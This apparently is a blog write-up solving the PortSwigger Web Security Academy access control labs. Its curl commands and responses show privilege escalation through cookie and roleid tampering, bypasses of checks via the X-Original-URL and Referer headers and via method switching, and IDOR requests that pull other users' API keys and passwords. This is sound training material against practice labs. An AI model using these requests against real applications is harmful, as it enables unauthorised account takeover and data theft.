Access Control - [PortSwigger]

Cover Image for Access Control - [PortSwigger]
Marmeus
Marmeus

Table of Contents

    Unprotected admin functionality [Apprentice]

    Looking at robots.txt, a path can be obtained.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/robots.txt
User-agent: *
Disallow: /administrator-panel

    By just accessing the URL, you can find the administrator panel in order to delete the user Carlos.

    Unprotected admin functionality with unpredictable URL [Apprentice]

    Looking at the web's source code, there is a JavaScript code with an URL.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/
<script>
var isAdmin = false;
if (isAdmin) {
   var topLinksTag = document.getElementsByClassName("top-links")[0];
   var adminPanelTag = document.createElement('a');
   adminPanelTag.setAttribute('href', '/admin-28banw');
   adminPanelTag.innerText = 'Admin panel';
   topLinksTag.append(adminPanelTag);
   var pTag = document.createElement('p');
   pTag.innerText = '|';
   topLinksTag.appendChild(pTag);
}
</script>

    In the URL there is the admin panel where you can delete the user Carlos.

    User role controlled by request parameter [Apprentice]

    Log in to the web page as "wiener", and then the cookie Admin will be added to your browser. Then, edit the cookie, you can use the plugin Cookie Editor to true.

    After that, you will be able to access the /Admin page, deleting Carlos.

    User role can be modified in user profile [Apprentice]

    After logging into the application, it is possible to update Wiener's email. Looking at the response, it is discovered the roleid attribute.

    kali@kali:~$ curl -X POST -d '{"email":"a@b.c"}' -H "Content-Type: text/plain;charset=UTF-8" -b "session=<WIENER_COOKIE>" https://<LAB_DOMAIN>.web-security-academy.net/my-account/change-email
{
  "username": "wiener",
  "email": "a@b.c",
  "apikey": "pdSKAyivDlf89oBOaC7FEo9elPLGsUrV",
  "roleid": 1
}

    Update the roleid value to 2 with the following command.

    kali@kali:~$ curl -X POST -d '{"email":"a@b.c","roleid":2}' -H "Content-Type: text/plain;charset=UTF-8" -b "session=<WIENER_COOKIE>" https://<LAB_DOMAIN>.web-security-academy.net/my-account/change-email
{
  "username": "wiener",
  "email": "a@b.c",
  "apikey": "pdSKAyivDlf89oBOaC7FEo9elPLGsUrV",
  "roleid": 2
}

    Then, you will be able to access the admin panel, deleting Carlos.

    URL-based access control can be circumvented [Practitioner]

    It is not possible to access the /admin panel because it is forbidden.

    kali@kali:~$ curl -D - https://<LAB_DOMAIN>.web-security-academy.net/admin/; echoHTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 15

"Access denied"

    Because the application is checking the URL to allow or deny access to the endpoint, the authorization can be bypassed using the HTTP header X-Original-URL, mentioned in the exercise statement.

    kali@kali:~$ curl -D - -s -o /dev/null -H "X-Original-URL: /admin/" https://<LAB_DOMAIN>.web-security-academy.net/
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: session=<COOKIE>; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 4760

    To delete the user Carlos, the parameters must appear in the main URL like so:

    kali@kali:~$ curl -D - -s -o /dev/null -H "X-Original-URL: /admin/delete/" https://<LAB_DOMAIN>.web-security-academy.net/?username=carlos
HTTP/1.1 302 Found
Location: /admin
Set-Cookie: session=<COOKIE>; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 0

    Method-based access control can be circumvented [Practitioner]

    To bypass the access control, you must perform a GET request instead of a POST one like so.

    kali@kali:~$ curl -D - -b "session=<WIENER_COOKIE>" https://<LAB_DOMAIN>.web-security-academy.net/admin-roles?username=wiener&action=upgrade
HTTP/1.1 302 Found
Location: /admin
Connection: close
Content-Length: 0

    User ID controlled by request parameter [Apprentice]

    Once logged as Wiener and changing the id value for "Carlos", it is possible to retrieve his API key.

    kali@kali:~$ curl -sq -b "session=<WIENER_SESSION>" https://<DOMAIN_LAB>.web-security-academy.net/my-account?id=carlos | grep "Your API Key is"
                        <div>Your API Key is: XcCsjE3wsu61djaaTjOjSNkimQBhQXAB</div><br/>

    User ID controlled by request parameter, with unpredictable user IDs [Apprentice]

    For every post appears the author with the associated GUID in the URL. So, to obtain the API key, you need to perform the same action as before but with Carlos' GUID.

    User ID controlled by request parameter with data leakage in redirect [Apprentice]

    Doing the same thing as in the exercise "User ID controlled by request parameter", you can get the API key.

    The web page responds with the header Location: /login and the content of the web page with Carlos' information, so to obtain his API key you need to avoid the redirect, this can be achieved using curl.

    kali@kali:~$ curl -sq -b "session=<WIENER_SESSION>" https://<LAB_DOMAIN>.web-security-academy.net/my-account?id=carlos | grep "Your API Key is"
                        <div>Your API Key is: Dd0ksWwhHm5xes139ItoAsqS6z62CFVA</div><br/>

    User ID controlled by request parameter with password disclosure [Apprentice]

    It happens the same thing as in the previous exercise.

    If you log in as Wiener and go to your account, the password field will appear with black dots, but looking at the source code appears the actual password.

    So because the web page returns the content of the webpage and immediately redirects you, you can use curl to obtain the Administrator's password.

    kali@kali:~$ curl -sq -b "session=<WIENER_COOKIE>" https://<LAB_DOMAIN>.web-security-academy.net/my-account?id=administrator | grep type=password
                            <input required type=password name=password value='19d7q21aperpm1vy3wm7'/>

    Insecure direct object references [Apprentice]

    On the web page, there is a "Live chat" section. In there, you can download the transcript, which will start by 2.txt.

    So by brute-forcing the available scripts, you can obtain Carlos' password.

    kali@kali:~$ curl -sq https://<LAB_DOMAIN>.web-security-academy.net/download-transcript/1.txt
CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is rr0bazwc8gv1p5o2klcq. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!
Hal Pline: Do one!

    Multi-step process with no access control on one step [Practitioner]

    Logged in as Administrator, intercept the requests to upgrade a user.

    As you will see, there is a confirmation POST request; that is the one that finally upgrades/downgrades the username

    POST /admin-roles HTTP/1.1
Host: <LAB_DOMAIN>.web-security-academy.net
Cookie: session=<COOKIE>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: https://0a28002a03ef4852c0c514e500b5004f.web-security-academy.net
Referer: https://0a28002a03ef4852c0c514e500b5004f.web-security-academy.net/admin-roles
Connection: close

action=upgrade&confirmed=true&username=carlos

    Doing the same request but logging as Wiener (just change the session cookie), you can become admin.

    kali@kali:~$ curl -D - -sqX POST https://<LAB_DOMAIN>.web-security-academy.net/admin-roles -b "session=<WIENER_COOKIE>" -H "Content-Type: application/x-www-form-urlencoded" -d "action=upgrade&confirmed=true&username=wiener"
HTTP/1.1 302 Found
Location: /admin
Connection: close
Content-Length: 0

    Referer-based access control [Practitioner]

    Logged as Administrator, if you try to upgrade a user but the Referer header doesn't contain /admin then you will obtain a "401 Unauthorized".

    Trying the same thing but logged as Wiener, you can upgrade any account.

    kali@kali:~$ curl -sqD - "https://<LAB_DOMAIN>.web-security-academy.net/admin-roles?username=wiener&action=upgrade" -b "session=<WIENER_COOKIE>" -H "Referer: https://<LAB_DOMAIN>.web-security-academy.net/admin"
HTTP/1.1 302 Found
Location: /admin
Connection: close
Content-Length: 0